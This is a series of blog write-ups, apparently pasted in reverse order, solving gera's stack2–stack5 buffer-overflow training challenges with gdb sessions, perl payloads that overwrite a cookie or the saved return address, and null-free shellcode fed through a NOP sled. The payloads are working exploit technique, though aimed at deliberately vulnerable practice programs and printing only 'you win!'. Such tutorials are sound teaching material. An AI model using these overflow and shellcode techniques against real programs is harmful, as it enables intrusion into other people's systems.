printyouwin.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ld -o printyouwin printyouwin.o
ld: warning: cannot find entry symbol _start; defaulting to 0000000008048060
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin
printyouwin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
hacking@hacking-theart:~/InsecureProgramming $ ./printyouwin
you win!

This is all well and good, however since we are using our shellcode within another already-started process, we won’t have the ability to reference the memory in the various sections of the executable to retrieve static values such as the string “you win!” which will be passed as an argument to the write() call. Since we know the other integer values for the 2 remaining arguments to write(), and can provide them directly, that is not such an issue because we can populate those registers with a mov instruction. But we need a way to get the string value we want to print into the ECX register, so write() will print it out for us. Enter the stack.

BITS 32             ;  Tell nasm this is 32-bit code.

  call mark_below   ;  Call below the string to instructions
  db "you win!",  0x0a, 0x0d  ; with newline and carriage return bytes.

mark_below:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  mov eax, 4        ; Write  syscall #.
  mov ebx, 1        ; STDOUT  file descriptor
  mov edx, 10       ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 10)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall:  exit(0)

What this code does is uses a trick of the call instruction within assembly to place the next address following the call onto the stack, which immediately after the call is popped back off of the stack into the ECX register. That address is used as a pointer to the string that we want to print.

This code we’ll want to translate not the ELF format, but to raw machine instructions, since we want to inject this code into a running process. To do this, we’ll use nasm without any arguments concerning the format parameter, then I’ll show you how many bytes the assembled shellcode takes up, and what it looks like when disassembled. Remember that, since we only have control of the 80 byte buffer we only really have that many bytes to work with, give or take a few, so our shellcode cannot be too bloated.

hacking@hacking-theart:~/InsecureProgramming $ nasm -o printyouwin1 printyouwin1.asm
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin1*
printyouwin1:     data
printyouwin1.asm: ASCII English text
printyouwin1.o:   ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ls -l printyouwin1
-rw-r--r-- 1 hacking hacking 45 2009-12-12 11:57 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ wc -c printyouwin1
45 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C printyouwin1
00000000  e8 0a 00 00 00 79 6f 75  20 77 69 6e 21 0a 0d 59  |.....you win!..Y|
00000010  b8 04 00 00 00 bb 01 00  00 00 ba 0a 00 00 00 cd  |................|
00000020  80 b8 01 00 00 00 bb 00  00 00 00 cd 80           |.............|
0000002d
hacking@hacking-theart:~/InsecureProgramming $ objdump -D printyouwin1
objdump: printyouwin1: File format not recognized
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 printyouwin1
00000000  E80A000000        call 0xf
00000005  796F              jns 0x76
00000007  7520              jnz 0x29
00000009  7769              ja 0x74
0000000B  6E                outsb
0000000C  210A              and [edx],ecx
0000000E  0D59B80400        or eax,0x4b859
00000013  0000              add [eax],al
00000015  BB01000000        mov ebx,0x1
0000001A  BA0A000000        mov edx,0xa
0000001F  CD80              int 0x80
00000021  B801000000        mov eax,0x1
00000026  BB00000000        mov ebx,0x0
0000002B  CD80              int 0x80

This shellcode, while awesome, is not foolproof for many scenarios. If we are using the gets() function, we cannot include newlines in our printed string, because they will prematurely terminate the gets() function. If we are using other typical string-based functions such as strcpy(), the null bytes will kill us by prematurely terminating those functions as well. Here is a slimmed down version of the shellcode, that uses various techniques such as high-and-low bytes of 16-bit registers, XORing registers against themselves to zero out 32-bit registers prior to instruction execution, smaller instructions such as jmp short to eliminate further null bytes, and calling back up into memory using a two’s compliment memory address to avoid more null bytes. It also eliminates the 0x0a and 0x0d newline or carriage return bytes as they would kill the gets() function prematurely.

BITS 32             ;  Tell nasm this is 32-bit code.

  jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  xor eax, eax      ; Zero  out full 32 bits of eax register.
  mov al, 4         ; Write  syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
  xor edx, edx
  mov dl, 8         ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 14)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "you win!"  ; with no newline or carriage return bytes.

And here is us, assembling the code and then putting it into the buffer, prefixed with a NOP sled to be executed successfully! You win!

hacking@hacking-theart:~/InsecureProgramming $ nasm -o stack5shellcode.out stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ md5sum stack5shellcode*
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode
0f2668754e312f90cef8dff7f6c90723  stack5shellcode.bytes
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode.out
bd6be6a87c2eee6e0fab27f13ba5853d  stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 stack5shellcode.out
00000000  EB13              jmp short 0x15
00000002  59                pop ecx
00000003  31C0              xor eax,eax
00000005  B004              mov al,0x4
00000007  31DB              xor ebx,ebx
00000009  43                inc ebx
0000000A  31D2              xor edx,edx
0000000C  B208              mov dl,0x8
0000000E  CD80              int 0x80
00000010  B001              mov al,0x1
00000012  4B                dec ebx
00000013  CD80              int 0x80
00000015  E8E8FFFFFF        call 0x2
0000001A  796F              jns 0x8b
0000001C  7520              jnz 0x3e
0000001E  7769              ja 0x89
00000020  6E                outsb
00000021  21                db 0x21
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C stack5shellcode.out
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking-theart:~/InsecureProgramming $ perl -e 'print "\x90" x 74 . "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "\xb0\xf7\xff\xbf\n";' | ./stack5
buf: bffff7b0 cookie: bffff80c
you win!hacking@hacking-theart:~/InsecureProgramming $ 

I wanted to make sure that a NOP sled was an understood concept, but really we could have just as easily put the shellcode at the very beginning of the buffer, padded the rest with junk, and executed all the same.

root@hacking-theart:/home/hacking/InsecureProgramming # perl -e 'print "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "A" x 74 . "\x80\xf7\xff\xbf\n";' | ./stack5
buf: bffff780 cookie: bffff7dc
you win!root@hacking-theart:/home/hacking/InsecureProgramming #

And that (finally) wraps us up for the stackN.c series of stack buffer overflows designed and provided for free by gera of Core. I’ll probably never, ever write about these again, it was pretty laborious, but I hope you didn’t find reading about it so. I used very many references through completing these write-ups, and I recommend them all, but if you can’t afford to go out and buy $500.00 worth of new books, you might want to check out the Safari Books Online site that O’Reilly offers, as it’s a pretty good deal (though less so now that they eliminated the 5-book shelf :-(). The Internet and Google (and Bing!) are your friends as well. Go forth, and break things!

Insecure Programming by Example – controlling EIP, stack4.c

Note: I couldn’t get this exploit to work on Debian 5, I think there must be some overflow protection or something I was working against on top of the ASLR I had already disabled. So I moved to the Hacking; the Art of Exploitation LiveCD, but any much older Linux should work for you (think Red Hat 7).

Ok, so everyone, before reading this one, repeat after me:

The goal is to control execution. The goal is to win. It doesn’t matter how you control things, or how you win, just win. Control is everything.

That may sound a little melodramatic, but I remember having a really hard time with stack4.c, not because the concepts were hard to grasp, but because I kept trying to control execution of the program the way I had in the previous three challenges, instead of just winning any way I could. That to me is the fundamental thing this challenge is attempting to teach the student. This particular challenge is not really about controlling EIP (though you will learn how to do that), rather, it’s about changing the way you think about computer programs in general. The point being that they do not always do what we think we told them to do, they do exactly what we told them to do ;-).

If you want to read a quick’n’dirty description of the right mindset for this sort of thing, along with some ideas on how to proceed if you want to be good at being bad, I highly recommend @kmx2600‘s article on the VRT blog, “How do I become a ninja?”. Indeed, those are the steps that I’m now following to better myself in this arena, and I’m the one that asked his team the question in the first place, so it’s only appropriate I should share my progress so others might get bitten by the bug as well.

On to the bug!

/* stack4-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x000d0a00)
		printf("you win!\n");
}

So…this may be tricky. Can anyone see why? See, they want us to make the cookie value equal to 0x000d0a00…can anyone spot the problem with this, alluded to in a previous post? That’s right, we can’t set the cookie variable to the appropriate value via the gets() function, because gets() terminates on a newline character, otherwise known as 0x0A. So we are going to need to find a way to win without setting the value of the cookie variable directly.

How else could we win? Think back to the beginning of this post, the object of the game is to take control of execution Any way we’d like to. We want the program to print out “you win!”. If we look at this program in a debugger, from the assembly language perspective, a way to do this might become clear.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./stack4
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x080483b4 <main+0>:    push   ebp
0x080483b5 <main+1>:    mov    ebp,esp
0x080483b7 <main+3>:    sub    esp,0x78
0x080483ba <main+6>:    and    esp,0xfffffff0
0x080483bd <main+9>:    mov    eax,0x0
0x080483c2 <main+14>:   sub    esp,eax
0x080483c4 <main+16>:   lea    eax,[ebp-12]
0x080483c7 <main+19>:   mov    DWORD PTR [esp+8],eax
0x080483cb <main+23>:   lea    eax,[ebp-104]
0x080483ce <main+26>:   mov    DWORD PTR [esp+4],eax
0x080483d2 <main+30>:   mov    DWORD PTR [esp],0x80484d4
0x080483d9 <main+37>:   call   0x80482d4 <printf@plt>
0x080483de <main+42>:   lea    eax,[ebp-104]
0x080483e1 <main+45>:   mov    DWORD PTR [esp],eax
0x080483e4 <main+48>:   call   0x80482b4 <gets@plt>
0x080483e9 <main+53>:   cmp    DWORD PTR [ebp-12],0xd0a00
0x080483f0 <main+60>:   jne    0x80483fe <main+74>
0x080483f2 <main+62>:   mov    DWORD PTR [esp],0x80484ec
0x080483f9 <main+69>:   call   0x80482d4 <printf@plt>
0x080483fe <main+74>:   leave
0x080483ff <main+75>:   ret
End of assembler dump.

This is where some very basic knowledge of x86 assembly language will pay off (and I mean very basic, as I am certainly no expert). The highlighted section above is essentially equal to the C functions:

gets(buf);

if (cookie == 0x000d0a00)
	printf("you win!\n");

I’ll leave it to the reader to read some intros on x86 assembly programming, or better yet, to read the excellent “Programming from the Ground Up” by Jonathan Bartlett, but it should be plain from the listing above what is occurring. Here is a summary with the details glossed over a bit.

First, we call the gets() function to get our input with call 0x804830c, then we move an 8-byte (DWORD) pointer located 8 bytes into the stack (ebp-0x8) into the eax register, and then we compare that value (stored at the de-referenced pointer, read a book on C if you don’t get the pointer stuff, it’s important) with the hex value 0xd0a00. Keeping the result of that comparison in mind (using the EFLAGS register, another important thing to understand), we then implement the if statement using the jne function, which stands for “jump if not equal”. If the comparison earlier was not equal, it jumps execution past the puts() function call (similar to printf) at 0x080483f2 which would print out our “you win!” statement. That’s how the if/then construct in C ends up looking in assembly.

The important thing to take away here, is that if we want to print out “you win!”, we simply need to get the instructions at 0x080483f2 to be executed. The easiest way to do that is to get EIP to point there. The easiest way to do that is to overflow the value for EIP that is stored during the execution of the main() call. Essentially, anytime any function is called such as gets(), printf(), or even main() which is what we are counting on here, the return address, which is the address to move execution to following the successful processing of the function call is populated onto the stack, along with any other variables local to the parent function or any other function that we’re calling. That means that if the program flow allows us to get to the point where it’s exiting execution of the function, and we can write to the stack an arbitrary amount of data with a bad function such as gets(), we can pretty much do whatever we want!

The game plan is to figure out where the return address is stored for/during the execution of the main() call, determine it’s distance from the buf variable, and figure out if we can overwrite it with the value 0x080483f2…if we can do this, we win. Let’s explore the state of the program at the time gets() is called using our debugger, specifically we want to see the state of the stack, the best way to do this is to examine stack frames with the backtrace command. I’ve highlighted the commands we’re going to use below, as a few of them are new ones you’ll want to have in your back pocket in the future.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./stack4
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) break gets
Function "gets" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (gets) pending.
(gdb) run
Starting program: /home/hacking/InsecureProgramming/stack4
Breakpoint 2 at 0xb7ef21c6
Pending breakpoint "gets" resolved
buf: bffff770 cookie: bffff7cc

Breakpoint 2, 0xb7ef21c6 in gets () from /lib/tls/i686/cmov/libc.so.6
(gdb) backtrace
#0  0xb7ef21c6 in gets () from /lib/tls/i686/cmov/libc.so.6
#1  0x080483e9 in main () at stack4.c:11
(gdb) info frame 0
Stack frame at 0xbffff760:
 eip = 0xb7ef21c6 in gets; saved eip 0x80483e9
 called by frame at 0xbffff7e0
 Arglist at 0xbffff758, args:
 Locals at 0xbffff758, Previous frame's sp is 0xbffff760
 Saved registers:
  ebp at 0xbffff758, eip at 0xbffff75c
(gdb) info frame 1
Stack frame at 0xbffff7e0:
 eip = 0x80483e9 in main (stack4.c:11); saved eip 0xb7eafebc
 caller of frame at 0xbffff760
 source language c.
 Arglist at 0xbffff7d8, args:
 Locals at 0xbffff7d8, Previous frame's sp is 0xbffff7e0
 Saved registers:
  ebp at 0xbffff7d8, eip at 0xbffff7dc
(gdb) print 0xbffff7dc - 0xbffff770
$1 = 108
(gdb) next
Single stepping until exit from function gets,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
main () at stack4.c:13
13              if (cookie == 0x000d0a00)
(gdb) x 0xbffff7dc
0xbffff7dc:     0x42424242

What we’re seeing here is that the stored EIP for the main() stack frame is 108 bytes from the buf variable’s start position. In essence, each memory address refers to a single byte of storage, so by calculating the difference between two addresses we know exactly how many bytes we must send to overflow the stored EIP in the stack. Since a single ASCII-encoded character is exactly one byte long, I went ahead and sent 108 “A” characters with 4 “B” characters tacked onto the end to overflow the stored EIP, and examining that memory address directly it worked.

So, let’s try our exploit know, knowing that 108 bytes is our offset for the variables. The code will fully execute, it will just jump back up the execution path on attempting to exit the first time and print out the “you win!” message, and then it will exit gracefully as if nothing had happened. Or at least, that’s the idea.

hacking@hacking-theart:~ $ perl -e 'print "A" x 108 . "\xf2\x83\x04\x08\n";' | ~/InsecureProgramming/stack4
buf: bffff790 cookie: bffff7ec
you win!
Segmentation fault

Ok, so, that worked! We still need to figure out why it segfaulted, and also why I couldn’t do this on the Debian 5 machine, but I’ll leave those subjects for future articles. Thanks for reading, hope you learned something.

Insecure Programming by Example – ruminations on stack3.c

So, last things first on this one, lets get the solution out of the way, and then we can talk about why exactly this challenge was so easy, and how it could be written to teach something. I’m not sure, but I think this one may have been an oversight on gera’s part…either way, let’s talk it through and hopefully teach something along the way.

Here is Insecure Programming by Example stack3.c:

/* stack3-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x01020005)
  		printf("you win!\n");
}

And here is the solution:

debian5:/home/mishley/InsecureProgramming# gcc -ggdb -o stack3 stack3.c 
/tmp/cci2jW0e.o: In function `main':
/home/mishley/InsecureProgramming/stack3.c:11: warning: the `gets' function is dangerous and should not be used.
debian5:/home/mishley/InsecureProgramming# perl -e 'print "A" x 80 . "\x05\x00\x02\x01" . "\n";' | ./stack3 
buf: bffffa00 cookie: bffffa50
you win!
Segmentation fault

Now, on to why this one was so easy and conceptually no different from the prior challenge. I believe gera was trying to teach us to be aware of null-byte termination of strings within memory. Basically, a lot of string functions from the ANSI C standard do whatever it is they are supposed to do until they hit a null-byte (null being 0x00), and most strings in memory are terminated using null-bytes because of this. The most infamous example of a function that uses null-bytes is strcpy() from string.h. The thing is, gets() does not terminate on a null-byte, instead it terminates on a newline (0x0A) or EOF (0x04) character. It will be important to know how the heck functions terminate input in upcoming examples in the stackN.c series and also in the further-along aboN.c series (which I have not yet completed). I thought it was important to explore why this one was so easy though, and to give the reader some food for thought as to how this might affect them in the future.

There will be more exploration of values that terminate our gets() function prematurely in upcoming articles, in the meantime, thanks for reading :-).

Insecure Programming by Example – gdb debugging & stack2.c

This post will be less detailed than the previous one, mainly because most of the concepts are identical.

Here is Insecure Programming by Example stack2.c:

/* stack2-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x01020305)
  		printf("you win!\n");
}

As you can see, the only real change is the value of the cookie variable. Seems simple enough, right? We can just send the program “5321” and be done with it! Of course, there is a reason gera wrote this almost-identical challenge, which will become apparent shortly. Let’s compile it and try to feed it the “5321” string, and see what happens.

debian5:/home/mishley/InsecureProgramming# gcc -ggdb -o stack2 stack2.c
/tmp/cc5NHEBj.o: In function `main':
/home/mishley/InsecureProgramming/stack2.c:11: warning: the `gets' function is dangerous and should not be used.
debian5:/home/mishley/InsecureProgramming# ./stack2
buf: bffffa00 cookie: bffffa50
JUNKLETSEXIT
debian5:/home/mishley/InsecureProgramming# perl -e 'print "A"x80 . "5321";' | ./stack2
buf: bffffa00 cookie: bffffa50
Segmentation fault

Ok, this is odd. We successfully overflowed the buffers, because we segfaulted due to overflowing the return address (or something else important) in the stack frame for gets(). But, it appears we didn’t get the “you win!” message we expected…like I said, things are not always this easy, and there is a good reason gera wrote this challenge. Now is the time to attach a debugger and take a look at why we are having some issues with this challenge. We will use GDB as our debugger-of-choice, it is adequate to this task, though for more complicated exploitation on other platforms (re: Windows) a GUI-based debugger like OllyDbg or Immunity Debugger might be preferred.

Using a debugger allows us to manually step through the execution of the code at the CPU or assembly language level and examine the state of the code at breakpoints we set during the execution. Think of a breakpoint as a pause button in your favorite video game, while the game is paused you can examine your inventory and statistics, change equipment, etc. The analogy is clear, while execution is paused with a debugger you can do tasks like that as well, such as examining the state of registers, stack traces and frames, and contents and state of RAM itself.

It would probably be good at this point for the reader to familiarize themselves with the basic premises of how a computer works (we’re talking Von Neumann machines, here, of the x86 variety ;-)). I couldn’t find a really good explanation on short notice, but there are a couple of good books on the subject. Various parts of “Hacking: The Art of Exploitation” by Jon Erickson and “The Gray Hat Hacker’s Handbook” by Various Artists cover this in multiple locations. The best intro I own, which is probably more in-depth than anyone but a CE/EE cares to know, is “Inside the Machine” by Jon Stokes. If you are looking for something you can read online for free, there is a GREAT book by Jonathan Bartlett called “Programming from the Ground Up” that covers all of the needed basics, including teaching the reader how to write real programs in pure assembly. Best of all, it can be read online or downloaded for free, and is available from online booksellers for a reasonable price. I personally bought the book because he did a great job, after using the online edition a lot.

With that said, let’s start use our debugger to examine the state of the system at the time of the segfault and see why the heck we didn’t get our “you win!” love from the program.

debian5:/home/mishley/InsecureProgramming# perl -e 'print "A"x80 . "5321\n";'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA5321
debian5:/home/mishley/InsecureProgramming# gdb -q ./stack2
(gdb) list
1	/* stack2-stdin.c                               *
2	 * specially crafted to feed your brain by gera */
3
4	#include <stdio.h>
5
6	int main() {
7		int cookie;
8		char buf[80];
9
10		printf("buf: %08x cookie: %08x\n", &buf, &cookie);
(gdb) list
11		gets(buf);
12
13		if (cookie == 0x01020305)
14	  		printf("you win!\n");
15	}
(gdb) break 13
Breakpoint 1 at 0x804843a: file stack2.c, line 13.
(gdb) run
Starting program: /home/mishley/InsecureProgramming/stack2
buf: bffff9d0 cookie: bffffa20
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA5321

Breakpoint 1, main () at stack2.c:13
13		if (cookie == 0x01020305)
(gdb) x/x &cookie
0xbffffa20:	0x31323335
(gdb) quit
The program is running.  Exit anyway? (y or n) y

What we see in the highlighted line is that the value of the cookie variable is set to 0x35333231 (remember your endian-ness). Which is curious, since we specified “5321” in our print statement…what could be happening here? The answer is, we are not passing the actual value “5321” in the form of integers via the print statement, instead we are passing the ASCII equivalent values for “5321”, which sure enough maps out to 0x35, 0x33, 0x32, and 0x31. So what we need here is an easy way to pass hexadecimal integers via Perl’s print statement. The easiest way to do this is to escape the characters, so we would be printing raw bytes that we specify. Here is an example with the problem we have faced in this article solved.

debian5:/home/mishley/InsecureProgramming# perl -e 'print "A" x 80 . "\x05\x03\x02\x01\n";' | ./stack2
buf: bffffa00 cookie: bffffa50
you win!
Segmentation fault

By using the Perl escaped characters \xNN we can print raw bytes to the STDIN of the stack2 program, successfully overflowing the cookie variable using a stack buffer overflow, and winning the game! I hope folks are finding these articles informative, I know I am learning a lot having to write it all out.